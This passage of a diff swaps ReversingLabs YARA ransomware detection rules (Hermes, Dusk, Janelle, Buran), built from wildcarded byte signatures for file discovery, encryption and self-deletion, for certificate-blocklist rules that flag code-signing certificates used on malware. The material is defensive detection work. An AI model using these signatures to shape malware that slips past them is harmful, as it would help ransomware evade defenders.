5A 6A ?? 66 89 45 ?? 58 6A ?? 66 89 85 ?? ?? ?? ?? 58 6A ?? 66 89 4D ?? - 66 89 4D ?? 66 89 8D ?? ?? ?? ?? 59 66 89 85 ?? ?? ?? ?? 6A ?? 58 66 89 85 ?? ?? ?? - ?? 33 C0 66 89 7D ?? 66 89 BD ?? ?? ?? ?? 8D 7D ?? 89 75 ?? 66 89 75 ?? 66 89 55 ?? - 89 75 ?? 66 89 75 ?? 66 89 8D ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? - AB 6A ?? 66 89 4D ?? 66 89 55 ?? AB 66 89 55 ?? 89 75 ?? AB 66 AB 58 6A ?? 66 89 45 - ?? 58 6A ?? 5F 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? - 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 59 66 89 45 ?? 33 C0 66 89 45 ?? 6A ?? 58 - 66 89 85 ?? ?? ?? ?? 6A ?? 58 66 89 85 ?? ?? ?? ?? 6A ?? 58 66 89 85 ?? ?? ?? ?? 6A - ?? 58 66 89 85 ?? ?? ?? ?? 6A ?? 58 66 89 85 ?? ?? ?? ?? 33 C0 66 89 7D ?? 66 89 7D - ?? 8D BD ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? 66 89 8D - } - $hermes_find_files_v2_p3 = { - AB AB AB 66 AB 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D - 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? - ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? - 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? - 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 - C0 0F 84 ?? ?? ?? ?? 8B 7D ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 - ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ?? - ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 - E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 - 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 - } - $hermes_find_files_v2_p4 = { - 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 8D 45 ?? 50 8D 85 - ?? ?? ?? ?? 50 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 45 - ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 - 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? - 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 8D - 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 - 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? EB ?? 8B 7D ?? F6 85 ?? ?? ?? - ?? ?? 74 ?? 53 E8 ?? ?? ?? ?? 59 FF 75 ?? 8D 85 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 50 53 - E8 ?? ?? ?? ?? 59 59 50 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B F0 8D - 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 2B F0 83 C4 ?? 33 C0 66 89 44 73 ?? 33 F6 8D 85 ?? - ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 5F 5E - 5B 8B E5 5D C3 - } - $hermes_enum_resources_v2 = { - 55 8B EC 83 EC ?? 53 56 57 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75 ?? 33 DB C7 45 ?? - ?? ?? ?? ?? 53 53 6A ?? 89 5D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? - 6A ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D - 45 ?? 50 56 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 7E ?? 6A ?? 58 66 - 39 07 75 ?? 66 39 47 ?? 75 ?? 50 8D 47 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 57 FF - 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? F7 46 ?? ?? ?? - ?? ?? 74 ?? FF 75 ?? 56 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 33 C0 5F 5E 5B 8B E5 5D C3 - 33 C0 40 EB - } - condition: - uint16(0)==0x5A4D and ((( all of ($hermes_find_files_v1_p*)) and ( all of ($hermes_encrypt_files_v1_p*))) or (( all of ($hermes_find_files_v2_p*)) and ( all of ($hermes_encrypt_files_v2_p*)))) and ( any of ($hermes_enum_resources_v*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="3a:94:9e:f0:3d:9d:d2:d1:50:b2:4b:27:4f:f6:d7:b4" and 1474156800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Dusk : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_954D0577D5Ce8999E0387A5364829F66 : INFO FILE { meta: - description = "Yara rule that detects Dusk ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "cde30f40-f13c-53da-8656-cc293433aa36" - date = "2021-08-12" - modified = "2021-08-12" + id = "70e770dd-95fd-5273-b6ee-9bb5eea30e3b" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.Dusk.yara#L1-L73" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b6b0b3be7c17115dc5f225a13228f8a4811d84ae095c3ceba2d89f569f2d40c7" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15386-L15404" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "84ddc08a0a55200f644778a0e3482f15e82d74c524f12a7ad91b1c3d4acfc731" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Dusk" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 03 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 06 6F ?? ?? ?? ?? - 0A 06 28 ?? ?? ?? ?? 0B 03 07 28 ?? ?? ?? ?? 03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? - ?? ?? ?? DE ?? 26 DE ?? 2A - } - $encrypt_files_p2 = { - 14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 73 ?? ?? - ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 07 20 ?? - ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? - ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 17 6F ?? ?? ?? - ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 11 - ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 08 6F ?? ?? ?? ?? 0A DE ?? - 09 2C ?? 09 6F ?? ?? ?? ?? DC 08 2C ?? 08 6F ?? ?? ?? ?? DC 06 2A - } - $dusk_delete_itself = { - 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 1A 8D ?? ?? ?? ?? 25 16 - 72 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? 03 28 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? 28 ?? - ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 0B 06 07 28 ?? ?? ?? - ?? 06 06 28 ?? ?? ?? ?? 18 60 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 06 73 ?? ?? - ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 04 28 ?? ?? ?? ?? 28 - ?? ?? ?? ?? DE ?? 26 DE ?? 2A - } - $find_files = { - 20 ?? ?? ?? ?? 72 ?? ?? ?? ?? A2 25 20 ?? ?? ?? ?? 72 ?? ?? ?? ?? A2 25 20 ?? ?? ?? ?? - 72 ?? ?? ?? ?? A2 0A 1F ?? 8D ?? ?? ?? ?? 25 16 1F ?? 28 ?? ?? ?? ?? A2 25 17 1E 28 ?? - ?? ?? ?? A2 25 18 1F ?? 28 ?? ?? ?? ?? A2 25 19 1F ?? 28 ?? ?? ?? ?? A2 25 1A 1F ?? 28 - ?? ?? ?? ?? A2 25 1B 1B 28 ?? ?? ?? ?? A2 25 1C 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? - ?? ?? 28 ?? ?? ?? ?? A2 25 1D 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? - ?? A2 25 1E 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 25 1F ?? 72 - ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 0B 16 0C 2B ?? 07 08 9A 0D - 1F ?? 28 ?? ?? ?? ?? 13 ?? 09 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 - ?? 11 ?? 9A 28 ?? ?? ?? ?? 13 ?? 06 11 ?? 28 ?? ?? ?? ?? 2C ?? 02 11 ?? 11 ?? 9A 11 ?? - 28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 02 09 28 ?? ?? ?? ?? DE ?? - 26 DE ?? 08 17 58 0C 08 07 8E 69 32 ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? - 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? - ?? 26 DE ?? 26 DE ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 20 - ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A - } - condition: - uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ($dusk_delete_itself) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Soblosol Limited" and (pe.signatures[i].serial=="00:95:4d:05:77:d5:ce:89:99:e0:38:7a:53:64:82:9f:66" or pe.signatures[i].serial=="95:4d:05:77:d5:ce:89:99:e0:38:7a:53:64:82:9f:66") and 1543968000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Janelle : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_Df5121Dc99D1Ab6B7E5229F6832123Ef : INFO FILE { meta: - description = "Yara rule that detects Janelle ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4fef3be5-8332-5ce2-b1e9-3993e6963331" - date = "2021-12-16" - modified = "2021-12-16" + id = "8dfc50be-7316-5a52-937b-4551aa642b7e" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.Janelle.yara#L1-L96" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "49f1eac82930606183ab9cf1d5c6c42534d58735876134793e9712e78eb5a4c7" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15406-L15424" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3b5e5b81890f1dea3dc0858cade54e7f88a21861818be79c3e7fba066f80d491" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Janelle" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $setup_env_p1 = { - 00 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 73 ?? ?? ?? ?? 0A 06 02 7D ?? ?? - ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ?? - ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 2B ?? 08 6F - ?? ?? ?? ?? 74 ?? ?? ?? ?? 0D 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 6F - ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 00 08 6F ?? ?? ?? ?? 2D ?? DE ?? 08 75 ?? ?? ?? ?? 13 ?? - 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 02 7B ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 00 16 28 ?? - ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 13 ?? 11 ?? 2C ?? 00 16 - 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ?? - ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 28 ?? ?? ?? - ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 02 16 28 ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 6F ?? - ?? ?? ?? 6F ?? ?? ?? ?? 16 FE 02 16 FE 01 13 ?? 11 ?? 2C ?? 00 28 ?? ?? ?? ?? 28 ?? ?? - ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? - 12 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? - ?? 00 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 28 ?? ?? ?? - ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 02 - } - $setup_env_p2 = { - 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 28 ?? - ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? - ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? - ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 2B ?? 00 16 28 ?? ?? ?? ?? 72 ?? - ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 72 ?? ?? ?? - ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 - 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 16 28 - ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 72 ?? ?? - ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 - ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 28 ?? ?? ?? ?? 02 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? - ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? - ?? ?? ?? 28 ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? - ?? 6F ?? ?? ?? ?? 00 06 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 16 28 ?? ?? ?? ?? - 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 28 ?? ?? - ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 - ?? 11 ?? 2C ?? 00 02 17 7D ?? ?? ?? ?? 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? - ?? 25 17 6F ?? ?? ?? ?? 00 6F ?? ?? ?? ?? 00 06 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 02 - 7B ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? - ?? ?? 00 00 2A - } - $find_files = { - 73 ?? ?? ?? ?? 0A 06 02 7D ?? ?? ?? ?? 06 04 7D ?? ?? ?? ?? 06 05 7D ?? ?? ?? ?? 00 00 - 03 28 ?? ?? ?? ?? 0B 00 07 0C 16 0D 2B ?? 08 09 9A 13 ?? 00 02 11 ?? 06 7B ?? ?? ?? ?? - 28 ?? ?? ?? ?? 00 00 09 17 58 0D 09 08 8E 69 32 ?? 06 7B ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? - 00 00 00 03 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 06 7D ?? ?? - ?? ?? 11 ?? 11 ?? 11 ?? 9A 7D ?? ?? ?? ?? 00 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 - ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 00 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? - 8E 69 32 ?? 00 DE ?? 13 ?? 00 72 ?? ?? ?? ?? 03 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE - ?? 00 00 DE ?? 26 00 72 ?? ?? ?? ?? 03 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? 2A - } - $encrypt_files = { - 00 28 ?? ?? ?? ?? 0A 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 73 ?? ?? ?? ?? 0B 28 ?? ?? ?? - ?? 04 6F ?? ?? ?? ?? 0C 73 ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ?? - ?? ?? ?? 6F ?? ?? ?? ?? 00 09 18 6F ?? ?? ?? ?? 00 08 06 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? - 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F - ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 1A 6F ?? ?? ?? ?? 00 07 06 16 06 - 8E 69 6F ?? ?? ?? ?? 00 07 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 03 19 73 ?? ?? ?? - ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 00 2B ?? 00 28 ?? ?? ?? ?? 00 11 ?? 11 ?? - 16 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 25 13 ?? 16 FE - 02 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 13 ?? 00 72 ?? ?? ?? ?? 11 ?? 6F - ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? DE ?? 00 11 ?? 6F ?? ?? ?? ?? 00 - 07 6F ?? ?? ?? ?? 00 00 DC 2A - } - condition: - uint16(0)==0x5A4D and ( all of ($setup_env_p*)) and ($find_files) and ($encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "INC SALYUT" and (pe.signatures[i].serial=="00:df:51:21:dc:99:d1:ab:6b:7e:52:29:f6:83:21:23:ef" or pe.signatures[i].serial=="df:51:21:dc:99:d1:ab:6b:7e:52:29:f6:83:21:23:ef") and 1613433600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Buran : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_760Cef386B63406751Ae83A9Eae92342 : INFO FILE { meta: - description = "Yara rule that detects Buran ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c2a36a8b-5c21-5c31-994d-b424c038dd21" - date = "2020-07-15" - modified = "2020-07-15" + id = "c2cbd1fd-ef68-5128-9c45-88b73a49130f" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Buran.yara#L1-L91" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5606e0acecd99ccf2feaa995353211302903a09bb2c4ec65903566215e2d5ca4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15426-L15442" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "43b56736afe081a1215db67b933413d7fbafbfc1be8213b330668578921ebca7" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Buran" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D - ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? - 89 5D ?? 89 5D ?? 88 8D ?? ?? ?? ?? 88 95 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? E8 ?? ?? ?? - ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF - 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? - ?? 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 33 - C0 5A 59 59 64 89 10 E9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? - ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? - ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? - 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 - C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 - 74 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 33 C9 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59 - 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 - } - $encrypt_files = { - 53 56 57 55 BB ?? ?? ?? ?? BF ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 83 3F ?? 74 ?? 8B 07 89 - C6 33 C0 89 07 FF D6 83 3F ?? 75 ?? 83 3D ?? ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 33 C0 A3 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 33 C0 89 - 43 ?? E8 ?? ?? ?? ?? 80 7B ?? ?? 76 ?? 83 3D ?? ?? ?? ?? ?? 74 ?? 8B 7B ?? 85 FF 74 - ?? 8B C7 E8 ?? ?? ?? ?? 8B 6B ?? 8B 75 ?? 3B 75 ?? 74 ?? 85 F6 74 ?? 56 E8 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? FF 53 ?? 80 7B ?? ?? 74 ?? E8 ?? ?? ?? ?? 83 3B - ?? 75 ?? 83 3D ?? ?? ?? ?? ?? 74 ?? FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 E8 ?? ?? ?? - ?? 8B 03 